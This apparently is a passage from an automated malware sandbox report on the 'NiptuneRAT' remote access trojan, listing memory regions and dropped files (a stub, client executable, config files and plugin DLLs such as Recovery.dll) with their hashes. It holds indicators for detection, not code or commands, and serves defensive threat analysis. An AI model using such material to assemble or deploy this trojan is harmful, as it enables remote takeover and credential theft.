memory/3012-173-0x000002224A820000-0x000002224A82A000-memory.dmp

memory/3012-174-0x00007FFAE7E50000-0x00007FFAE8912000-memory.dmp

memory/3012-175-0x00000222274A0000-0x00000222274B0000-memory.dmp

memory/3012-176-0x00000222274A0000-0x00000222274B0000-memory.dmp

memory/3012-177-0x000002224ABB0000-0x000002224ABC2000-memory.dmp

memory/3012-178-0x000002224ABD0000-0x000002224AE50000-memory.dmp

memory/3012-188-0x00000222274A0000-0x00000222274B0000-memory.dmp

memory/3012-189-0x00000222274A0000-0x00000222274B0000-memory.dmp

memory/3012-190-0x00000222274A0000-0x00000222274B0000-memory.dmp

memory/3012-191-0x000002224D260000-0x000002224D37E000-memory.dmp

C:\Users\Admin\Desktop\NiptuneRAT-main\Stub\Stub.exe

MD5 0da861f192f8e722505826c141c05a40
SHA1 4d717f9d2a64caf68374ed1e246cf38dd208227b
SHA256 4c6a73271e3a0794bff16fa39b45771e9e39b873e12fdc7031e03fbda238667b
SHA512 7b61ac15ba95e0b8a9ebac2f33e7137083b18204de503e7a2946af65e9d5b6ad9e826a27770e10862dc825f3e20e8bd72463593528a623c4603f9628f8c27280

C:\Users\Admin\Desktop\NiptuneRAT-main\Usrs.p12

MD5 e22a0515af0220bc5c4497f85e518e24
SHA1 2702b7cf46f8ae5ed920469b169c03b07a5d14e7
SHA256 4512413f9478d03074b4bea5deaff1681ec28c74839c16f3cf7d56b0418a8f92
SHA512 cbee300346822a3cd9da43985143258085513bf4515287974f9def05c047477f313648f4017118167f30f1eb241b5c490a11128f98352f96b24f0d2e62840d92

C:\Users\Admin\AppData\Local\NiptuneRAT\NiptuneRAT.exe_Url_2virb1mjsp4und03eye3evhna3xsy40a\4.1.0.0\user.config

MD5 77d636e08fe9de62cf19ad656409ccde
SHA1 827de958d0c46346c9c581be646b8c3a61fab648
SHA256 4155b94bb3ef65ff1f15d7f337f2ada62d474ec5ba7557562618e5206e83a558
SHA512 60712d620a884d897457f56d4ecc758c9a753c31f58fcb9d814af58dbc2e105435c9a73f837b4146e2e8edb7834b83f51dcecaaf39cd6f69be59d7bb5c28b839

C:\Users\Admin\AppData\Local\NiptuneRAT\NiptuneRAT.exe_Url_2virb1mjsp4und03eye3evhna3xsy40a\4.1.0.0\u04otmyy.newcfg

MD5 67ae3b067855a1e16f01e16ee389c8f0
SHA1 3bef83c7922cda26497a45bbfe209e65b14234a0
SHA256 07e9e4841eeace951264cf7b4cf5e8c6993fc923b851cb2360122fe7fec2ef0a
SHA512 db73d3a4a9523db12264d1cf53e50d44589af8dc83bdbb041eff8977f6134666d1836014ebde472039036a13beabe6adee026712f385453ed654ae5ac504e699

C:\Users\Admin\Desktop\$77NiptuneClient.exe

MD5 94ac7fdf09c22c9bfd33c451adfc1681
SHA1 7bb6e40d7d2492d09b281fcd64ec94aa47d75e96
SHA256 f7446c1f2f1f0b7882ea06a028c77e17898cdd81b13ad6fd0b92c6d3377bbb9d
SHA512 a532faabbe374c8ceb32d7fd8dc41b853c97e6a5831fbbb0dccfc46dbcc28ed9225959bc4bb2468379d53a0e8548ee592468e1c564f16e1a830205aafe1ca1c2

memory/3356-226-0x0000000000500000-0x0000000000516000-memory.dmp

memory/3356-227-0x00007FFAE7E50000-0x00007FFAE8912000-memory.dmp

memory/3012-228-0x00000222274A0000-0x00000222274B0000-memory.dmp

memory/3356-229-0x000000001B2B0000-0x000000001B2C0000-memory.dmp

memory/3012-230-0x00000222274A0000-0x00000222274B0000-memory.dmp

memory/3356-231-0x00007FFB09280000-0x00007FFB09489000-memory.dmp

memory/3012-233-0x00000222274A0000-0x00000222274B0000-memory.dmp

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\RssCnLKcGRxj.dll

MD5 f6808c4fbbe0275db03b2cc5b4c2bc0d
SHA1 e40b61c64c68f72fc5144f5057d54229babdecf8
SHA256 e204d15f0e7269d364157aaab265a5dfbe7e76c9f6202bf90998f0edd77ca248
SHA512 f077c49f6943d0e40799b3b42d1e11f50dabca48305c36ef2acd3258c990e0e0f982fbb0c27b1243aa15d2ed7b398b70f07dddc9ba76ff032ba74a24c8e08fb4

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\0guo3zbo66fqoG.dll

MD5 e4ebcf76ff80ef398d3ab77d577f4c08
SHA1 cb9e6b30a63d50ae87610f6855b64abfb25691d2
SHA256 9661b1abc9a3e95e591c49c3838a64a066a2ff3c6de08d8aa7b541c4a75cd8e5
SHA512 8f37cedd987dd14181fdfa861b8a95271868dac21aa9df80bd6daa831ae20f4b4965c8be3e36f32aa220bd37ded11a7568ae237c9c9641bb4fc087f6fe104b01

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\59Zp7paEHDF7luJ.dll

MD5 6b24cb03ca441f81764f14412abe22c4
SHA1 37eefe413b01080c85f437e5845add5f9e3c2c10
SHA256 057313c967420c8a6ef644a78109af3f681fb332f9e8ebb55e4a29efeb093afe
SHA512 9ef792c0b90f6eb1a6ed23402fd19bcf7ddb48ec0b7a18eaf7d708e873a060b4698e3174400162f2436a0180ebac72400883dd5cebe246a8690a053a431877a7

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Audio.dll

MD5 cf863d12b476133d97f3827007f53fa1
SHA1 97478287ae4ad542671fce20b39ccc47c230b5d8
SHA256 9e80ce9cd2c8d4b15a1f7326a0b6674f3da617f4704cf5a49bb99b7dceed1b5e
SHA512 9ebfab2f4af63b69156aacbdd6e9f4ff581bb7c1cbf0d4d1f7faa35c838fcfbc77446ae3c735f8bb927c744ae81d9645b2c11c365ac49bb8732523520712ed5d

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\K8oCBS3ThnW0WP.dll

MD5 081ea64eb8b4f333014276d59fdec0b4
SHA1 0791627bb38d6818ceb2bf419f19376aef14e494
SHA256 b5022706fec021abf416d4b4f806485a2915f3a47b71e73241ef73e7845b21f9
SHA512 b5b9e2c1927313919de6ddc8cc5ddc3438846be8817e022f964ec52612f6ad5301a83c88888fffa1cdabc9a29f42431a4c84668987edb32b4bd6587d64dedd54

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\G3nl0mDcABnDuZ.dll

MD5 7884b35cfe1ba24ad7e4cd78f48a1a09
SHA1 86cf35919ead978c5fe817d6c4f2e18bb32727fb
SHA256 ed4562e5b6527f2ebb2318f83f31a3af4dbe06dbf8e764ebf5706b0790346b88
SHA512 30a57bc171ec76c7295766df01f8970ff98dbb3a13a5c52a1e75329fb45b69b7fa8c199da0cb6648258b90c48c3341c3bde73088e773f5037f3de323192bcf8f

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\FBSyChwp.dll

MD5 841ff739bd70a4c6f61a43793feea007
SHA1 ec73f4b50c2e36568bfb21b3f87cb8ca55ae5722
SHA256 cda6e05e54f1da8511958683aa100eb4bc6bb749ad4699676755dda18c152d84
SHA512 086c1ac156b380ce850dcbbbd3ca59477953f665dc592944d851e89aa17f846c94a1003b57f5c842cf3e5536523828b407ee2a0b170f01605d7d72eb5c7db2f8

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\EVa7gBMKoaHmLC.dll

MD5 ec4f4d4e9f133b53f5cab8a01193bdbc
SHA1 8a9539f232f1ee7437308af216c80efef434b3d7
SHA256 63b132fb283869799d218b453ba8a032b5a2fea372a27871326536776fae9481
SHA512 009967c45320248cbc5dab177f725c8b91e1f540e4651cfc59e25137f8c9933a84580f364057d1f6c11efd783b2bd782ecf7274ef6cf3a45252cf65ae339c6b3

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\KNTmoSnG.AnarHs.dll

MD5 1681e0f3311751361030ff30a957a1ed
SHA1 8f3b55e130af507549817fda37474a1391e6b8f2
SHA256 234724f14dbb999853aeb872d7e6c3ed0b3de5b105009b5c66131a2af8d0dbb4
SHA512 60690b2c1e2816a640f5763f9c20de9a39cb9735ea4a3f0bf4f477d3e184f8791e556313a7523c70ed2fb9182d520842bce70057cedd5cb89b923fd6f9067dd1

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\maSN8TBMgUEC.dll

MD5 d5a278acdafa0c8b4380efb7d83e053e
SHA1 376218e3aa607a3b82be55cfa718826991953654
SHA256 d93d72c6e929bd9cea468458e6c0558908a92f0ecd11f4f4db0f49acfe9d4fc5
SHA512 138def485e02fdcf1809f0d8162fdd2a50575f3cab56968fbc6d09d0c1e9fe6803860315e45c1a7e0eff75958988ed6b08735fa680fa66527630c6789a23a00b

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\oYsKwDG.dll

MD5 19f8d8099cc9b7b6a68e7efebc44ac18
SHA1 5a5cca2ad1168252d79ef7c0ffda58726de7f79c
SHA256 9157a6021901939611c80c4246dbec6007200b2f2457d348ce8834bef9872535
SHA512 6bb58b3157feb010555382c5b5b5d0ee982af324f1d88512ea5d5b984b949995d7387a9496388cb7b9589007ae9ec651e5f8219085517d82eef093e4ebb7ecbc

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\mML6WKMqdxjDGA.dll

MD5 e03b206eec8a7efbd1a47909071226e5
SHA1 21163989ea524920e874bc7932adfcd5e94f854e
SHA256 778877431354a9584325dadb663be077f757227eaae8bcad33e4bf26efd6b965
SHA512 831ed74419f1b4c3250fbff20be16ed7058a851d7168a17e8a4dcf284a19412feee42a8c198af34b37571de33a80c48ac855f5d018ea9e2cfdcd846b832155ff

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\PK0TcnqTGFagQTS.dll

MD5 fa90a2aee0d172000257c4faca31237c
SHA1 b317281b4acaaf1d7b7255c5e92887322abae892
SHA256 991fc53fa1aa7b5cd0b6e19dab536873d68e4413fd55b533601a3a2582d38a49
SHA512 b05c0b52e011089258ad31dd23a1f8a0cc8145b202e42e2a9d4fdf892c12d4a7b5843cc7721041295ab796e8bc98747b9e321c4e54bfd1a7c9a02dd2796fc405

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Recovery.dll

MD5 08131d6801c109f0764a4fe690aba8ef
SHA1 e732af02326483700eda52ff40dc70cff6b7afcb
SHA256 bc3a9390c043f8002e356ad34b2b11d3486682d0c275ab6729bb4a312e324f51
SHA512 228ab0aa0ddfdb0c099f1db5112304d776cb97ab2dab376d38023e446cb2aec30d9585eba444818f3241ffbc28565a1aef11f97b5b42bf57037de8e4a8536e2a

memory/3356-248-0x000000001D0C0000-0x000000001D136000-memory.dmp

memory/3356-249-0x00000000026C0000-0x00000000026F4000-memory.dmp

memory/3356-250-0x000000001B200000-0x000000001B21E000-memory.dmp

memory/3012-251-0x000002224C6E0000-0x000002224C7E0000-memory.dmp

memory/3356-252-0x00007FFAE7E50000-0x00007FFAE8912000-memory.dmp

memory/3356-253-0x000000001B240000-0x000000001B272000-memory.dmp

memory/3356-254-0x000000001B2B0000-0x000000001B2C0000-memory.dmp

memory/3356-255-0x000000001B2B0000-0x000000001B2C0000-memory.dmp

memory/3356-256-0x00007FFB09280000-0x00007FFB09489000-memory.dmp

memory/3356-258-0x000000001D240000-0x000000001D270000-memory.dmp

\??\PIPE\lsarpc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/3012-262-0x000002224C6E0000-0x000002224C7E0000-memory.dmp

memory/3356-263-0x000000001B2B0000-0x000000001B2C0000-memory.dmp

C:\Users\Admin\Desktop\pp.anarh.txt

MD5 9be9355dfef9f635bef4a94e4c040209
SHA1 b69a9fccf3391e898dbf8755ef71f7fc52e15880
SHA256 9017a399259db69ba7e4a84f38843ca91df676a0b44ecec5ef884f83ed5fd44f
SHA512 ad8dd6525d98214eb92c825bff6a197a7fe8bdda37f7b608725b4dc14780570104a0a2726ab971358b9b0ac40b8499b852b96d60a3aded254487d1c3f369b410